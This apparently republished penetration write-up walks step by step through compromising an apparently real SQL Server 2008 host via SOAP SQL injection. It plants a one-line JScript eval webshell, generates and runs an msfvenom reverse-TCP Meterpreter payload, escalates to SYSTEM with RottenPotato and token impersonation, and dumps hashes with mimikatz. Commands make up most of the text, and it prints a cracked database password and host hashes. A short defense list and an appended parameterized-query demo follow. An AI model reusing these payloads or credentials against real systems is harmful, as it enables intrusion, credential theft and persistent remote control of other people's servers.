SOAP injection on a SQL Server 2008 host, combined with MSF for privilege escalation

Source: Internet
Author: User
Tags: dba, echo command, soap, sql injection, wsdl


Simeon

In a real penetration, successful exploitation is usually a combination of several techniques, and this case applies recent ones: the tester used sqlmap to confirm the injection point, obtained a webshell through sqlmap, then used MSF to exploit MS16-075 and finally obtained SYSTEM privileges on the target server. This article is a new extension of exploitation: when the conventional nday privilege escalations all failed, MS16-075 combined with MSF succeeded, a classic case.

1.1.1 Scanning for SOAP injection vulnerabilities

1. Using the Web Services scanner in AWVS for vulnerability scanning

Open AWVS and select the Web Services scanner. As shown in Figure 1, fill in the target URL in the WSDL URL field. Note that it must end in asmx?wsdl when there is an asmx file; if there is none, fill in the URL directly, for example: http://1**.***.***.***:8081/?wsdl.

Figure 1 A SOAP injection vulnerability scan

2. Handling the SQL blind injection

After the AWVS scan, verify that the URL has a SQL Blind (26) finding. In AWVS, click "View HTTP Headers" on the right and copy the content into a text file. Also process the vulnerable statement, which in this example is: <urn:string>-1&apos; or 3*2*1=6 and 000223=000223 or &apos;gPireHft&apos;=&apos;</urn:string>

You need to replace the part marked in red in the figure with "-1*" (the sqlmap custom injection marker).

3. The complete request then reads as follows:

POST /service1.asmx HTTP/1.1
Content-Type: text/xml
SOAPAction: "http://tempuri.org/ZcpdList"
Content-Length: 716
X-Requested-With: XMLHttpRequest
Referer: http://1**.***.***.***:8081/?wsdl
Host: 1**.***.***.***:8081
Connection: keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/" xmlns:urn2="http://tempuri.org/AbstractTypes">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:ZcpdList>
<urn:Inventory_dhs>
<urn:string>-1*</urn:string>
</urn:Inventory_dhs>
</urn:ZcpdList>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Response

1.1.2 Confirming the SOAP injection vulnerability

1. Using sqlmap to detect the SQL injection vulnerability

Save the request above as 1**.***.***.***.txt, copy the file to the directory containing sqlmap.py, and run: sqlmap.py -r 1**.***.***.***.txt. Answer the sqlmap prompts:

custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] y

SOAP/XML data found in POST data. Do you want to process it? [Y/n/q] y

As shown in Figure 2, sqlmap confirms that the SQL injection vulnerability exists, that the database server runs Windows R2, that the DBMS is SQL Server 2008, and that the SOAP parameter is injectable through a UNION query.

Figure 2 A SOAP injection vulnerability exists

2. Checking whether the database user has DBA privileges

(1) Testing with automatic parameter submission

As shown in Figure 3, run: sqlmap.py -r 1**.***.***.***.txt --is-dba --batch. The two confirmations no longer need to be answered with Y, because with the --batch option sqlmap automatically submits the default answers.

Figure 3 Automatic submission of parameters for judgment

(2) The current database user is a DBA account

As shown in Figure 4, sqlmap reports that the current user is a DBA, displaying the result as True. This means the database connection runs with sa privileges, so a webshell can be obtained through the --os-shell option.

Figure 4 Determining whether the user is a DBA account

3. Getting the sa account password hash

As shown in Figure 5, run sqlmap.py -r 1**.***.***.***.txt --password --batch to dump the password hashes of all logins connected to the database directly:

Figure 5 Obtaining the sa account password hash

4. Cracking the sa account password

The database password hashes obtained by sqlmap above are:

[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c
[*] sa [1]:
    password hash: 0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28

Query the sa hash "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" at www.cmd5.com; as shown in Figure 6, the cracked result is "qaz123wsx".

Figure 6 Decrypting the sa password hash value

1.1.3 Getting a webshell through --os-shell

1. Getting an os-shell

Run sqlmap.py -r 1**.***.***.***.txt --os-shell and answer the prompts in the sqlmap window:

custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y

SOAP/XML data found in POST data. Do you want to process it? [Y/n/q] Y

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

You can also run sqlmap.py -r 1**.***.***.***.txt --os-shell --batch to skip the manual input.

2. Finding the directory of the web application

(1) Viewing files and directories

After running dir c:\ you can list the directories and files; continue with dir c:\inetpub\wwwroot (Figure 7). There is no web application there, so that directory is excluded.

Figure 7 Viewing files and directories

(2) Finding the real website directory

By checking the C, D, E and F drives, the suspected website files are found on the E drive; run dir e:\software\ams_noflow to view them (Figure 8).

Figure 8 Viewing Web site files

3. Testing the real site directory

(1) Generating a test file

As shown in Figure 9, use the echo command echo "thisis test" >e:\software\ams_noflow\t.txt to create t.txt under the website root, with the content "thisis test".

Figure 9 Generating files

(2) Website Access test

Enter http://1**.***.***.***/t.txt in the browser to test (Figure 10). The expected content is returned, so this directory is the real physical path of the site.

Figure 10 Site Access Testing

4. Getting the web.config contents

In os-shell, run type e:\software\AMS_NoFlow\web.config to view the web.config file. Because of display settings, the full content may not be visible in the sqlmap command window, but sqlmap keeps the details in its output directory (Figure 11). Open the log file there and you can see that the sa password in the connection string is qaz123wsx, consistent with the sa password cracked earlier.

Figure 11 Viewing the web.config contents

5. Obtaining IP address information

As shown in Figure 12, run ipconfig in os-shell to obtain the target's IP configuration: the host has an independent public IP and an intranet IP address. Other commands can also be executed in os-shell.

Figure 12 Obtaining an IP address

6. Getting a webshell

(1) Generating the shell file

Run in os-shell: echo ^<%@ page language="Jscript"%^>^<%eval(request.item["Pass"],"unsafe");%^> > E:\software\AMS_NoFlow\cmd.aspx

As shown in Figure 13, the echo returns 1 with no other output, which on its face means the file was created successfully.

Figure 13 Generating Webshell

(2) Getting the webshell

Using the China Chopper webshell management tool, add a record for http://1**.***.***.***/cmd.aspx with the one-line backdoor password pass (Figure 14); the connection succeeds and the webshell is obtained.

Figure 14 Getting Webshell

1.1.4 Conventional privilege escalation fails

1. Generating the system information file

Run in os-shell: systeminfo > syd1-0081dsb.txt

2. Downloading windows-exploit-suggester

windows-exploit-suggester: https://github.com/gdssecurity/windows-exploit-suggester/

3. Updating the vulnerability database and comparing against it

Run windows-exploit-suggester.py -u under Python to update the database, then compare the system information against it:

windows-exploit-suggester.py --audit -l --database 2018-06-04-mssb.xls --systeminfo SYD1-0081DSB.txt > syd1-0081dsb-day.txt, as shown in Figure 15.

Figure 15 Vulnerability comparison

4. Viewing the vulnerability results

Open syd1-0081dsb-day.txt in the C:\Python27 directory (Figure 16). The tool identifies the operating system as Windows R2 with multiple vulnerabilities; the most recent is MS16-075.

Figure 16 Viewing the vulnerability results

5. Testing the privilege escalation exploits

According to the vulnerability numbers, collect the corresponding exploit files and test them on the target server. Apart from the MS16-075 exploit, all the tests failed and privileges could not be escalated.

1.1.5 MS16-075 privilege escalation with MSF

1. Generating a reverse-connect payload with MSF

Run the following command under MSF:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433 -f exe -o 4433.exe

Here windows/meterpreter/reverse_tcp is the reverse-connection payload type; lhost is the IP address of the server that receives the connection (it must be a standalone server or have a public port mapping; in other words, the reverse connection must be reachable); lport is the listening port; 4433.exe is the generated program.

2. Starting the listener on the listening server

(1) Start MSF

msfconsole

(2) Configuring the Meterpreter handler

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33
set LPORT 4433
exploit

3. Uploading 4433.exe to the target server and running it

Upload 4433.exe to the target server via China Chopper or os-shell and execute it.

4. Viewing system information

As shown in Figure 17, the target connects back to the listening server; run sysinfo to obtain its system information.

Figure 17 Getting System Information

5. Meterpreter's built-in privilege escalation fails

Running getuid and getsystem in Meterpreter, as shown in Figure 18, fails to escalate privileges.

Figure 18 Privilege escalation with the default Meterpreter fails

6. Privilege escalation with MS16-075

(1) The MS16-075 exploit can be downloaded from:

https://github.com/foxglovesec/RottenPotato

(2) Uploading the potato file

Upload potato.exe via the webshell, or run the upload command under MSF:

upload /root/potato.exe

(3) Getting the SYSTEM token

Run the following commands in turn:

use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u

As shown in Figure 19, the SYSTEM token is successfully obtained.

Figure 19 Obtaining the SYSTEM token

(4) Getting SYSTEM privileges

Run the following commands:

impersonate_token "NT AUTHORITY\\SYSTEM"
getuid

As shown in Figure 20, SYSTEM privileges are successfully obtained.

Figure 20 Getting system permissions

(5) Getting the password hashes

Run the hashdump command in Meterpreter (run hashdump); as shown in Figure 21, the server password hash is obtained:

administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920:::

Figure 21 Getting the password

In this case, loading mimikatz (load mimikatz) for plaintext password recovery gave poor results: running the kerberos, livessp, msv, ssp, tspkg and wdigest commands returned no plaintext password. You can also run mimikatz_command to enter the mimikatz command prompt.

(6) Cracking the NTLM hash

Copy the NTLM hash a59a64a645487c1581dea603253c7920 to cmd5.com for cracking; cmd5 charges for this, so you can also use http://www.objectif-securite.ch/en/ophcrack.php and https://www.somd5.com/. As shown in Figure 22, the password is cracked successfully.

Figure 22 Cracking the NTLM hash

7. Logging in to the server

Port scanning with nmap -sS -Pn -A 1**.***.***.*** or masscan -p 1-65535 1**.***.***.*** shows that port 3389 is open; log in with mstsc (Figure 23) and the server login succeeds.

Figure 23 successfully logged in to the server

1.1.6 Summary and Defense

1. Summary of the main commands used in this penetration

(1) sqlmap commands, in order

sqlmap.py -r 1**.***.***.***.txt
sqlmap.py -r 1**.***.***.***.txt --is-dba
sqlmap.py -r 1**.***.***.***.txt --password --batch
sqlmap.py -r 1**.***.***.***.txt --os-shell

(2) Commands run in os-shell

ipconfig
dir c:\
echo "thisis test" >e:\software\ams_noflow\t.txt
echo ^<%@ page language="Jscript"%^>^<%eval(request.item["Pass"],"unsafe");%^> > E:\software\AMS_NoFlow\cmd.aspx

(3) Commands run under MSF

Generate the reverse-connect payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433 -f exe -o 4433.exe

(4) MSF startup and listening

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 (actually a public IP address)
set LPORT 4433
exploit

(5) MS16-075 privilege escalation commands

use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid

(6) Getting the password hashes

run hashdump

(7) Mimikatz password recovery

load mimikatz

kerberos, livessp, msv, ssp, tspkg, wdigest (test each command; some display plaintext passwords)

mimikatz_command: enters the mimikatz command prompt

(8) Getting passwords from the mimikatz command line (not tested)

privilege::debug
sekurlsa::logonpasswords

2. Penetration summary

In this penetration, sqlmap was used to test the SOAP injection and confirm that the SQL injection point was usable, and the webshell was then obtained through os-shell. After the webshell, the ordinary nday methods were tried and failed; privilege escalation then succeeded through MSF with MS16-075. windows-exploit-suggester remains useful for identifying and testing local vulnerabilities: choosing the newest vulnerability from its audit for privilege escalation has a hit rate of about 99%.

3. Security Defense

After the server was compromised, no security protection software was found on it. Based on experience, the following defenses are recommended:

(1) Filter the SOAP parameters, removing the dangerous characters that lead to SQL injection.

(2) Use a low-privileged user for the MSSQL database connection.

(3) Patch and upgrade the server regularly.

(4) Install anti-virus software, a WAF and a hardware firewall to raise the cost and difficulty of attack.
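As an added illustration of defenses (1) and (2), and not code from the original article or the target application, the following Python parses the page's ZcpdList request, pulls out the <urn:string> value, and runs the AWVS-reported payload against a string-concatenated query and a parameter-bound one. SQLite stands in for the SQL Server 2008 backend and the inventory table is constructed for the demo; binding the parameter is what makes the tautology harmless, so character filtering becomes a secondary layer.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Namespaces taken from the captured SOAP request on the page.
NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/",
      "urn": "http://tempuri.org/"}

# The boolean payload AWVS reported for the <urn:string> element.
PAYLOAD = "-1' or 3*2*1=6 and 000223=000223 or 'gPireHft'='"

# Constructed envelope using the page's operation and element names; {} holds the parameter.
REQUEST = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:urn="http://tempuri.org/"><SOAP-ENV:Body><urn:ZcpdList><urn:Inventory_dhs>'
    '<urn:string>{}</urn:string></urn:Inventory_dhs></urn:ZcpdList></SOAP-ENV:Body>'
    '</SOAP-ENV:Envelope>'
)

def extract_param(xml_text):
    """Return the text of Body/ZcpdList/Inventory_dhs/string, as the service would read it."""
    root = ET.fromstring(xml_text)
    node = root.find("soap:Body/urn:ZcpdList/urn:Inventory_dhs/urn:string", NS)
    return None if node is None else node.text

def make_db():
    """In-memory SQLite stands in for SQL Server 2008; table and rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE inventory (code TEXT, name TEXT)")
    con.executemany("INSERT INTO inventory VALUES (?, ?)",
                    [("A100", "bolt"), ("A200", "nut"), ("B300", "washer")])
    return con

def lookup_vulnerable(con, code):
    """Concatenation: the SOAP value becomes part of the SQL text (the flaw sqlmap exploited)."""
    return con.execute(f"SELECT code, name FROM inventory WHERE code = '{code}'").fetchall()

def lookup_safe(con, code):
    """Bound parameter: the value is data only, so the tautology is compared as a literal string."""
    return con.execute("SELECT code, name FROM inventory WHERE code = ?", (code,)).fetchall()

def demo():
    """Row counts each version returns for the payload: (vulnerable, safe)."""
    con = make_db()
    value = extract_param(REQUEST.format(PAYLOAD))
    return len(lookup_vulnerable(con, value)), len(lookup_safe(con, value))

if __name__ == "__main__":
    print(demo())  # (3, 0): every row leaks through concatenation, none through binding
```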

For more Sqlmap technical articles, please subscribe to HTTP://BLOG.51CTO.COM/CLOUMN/DETAIL/3

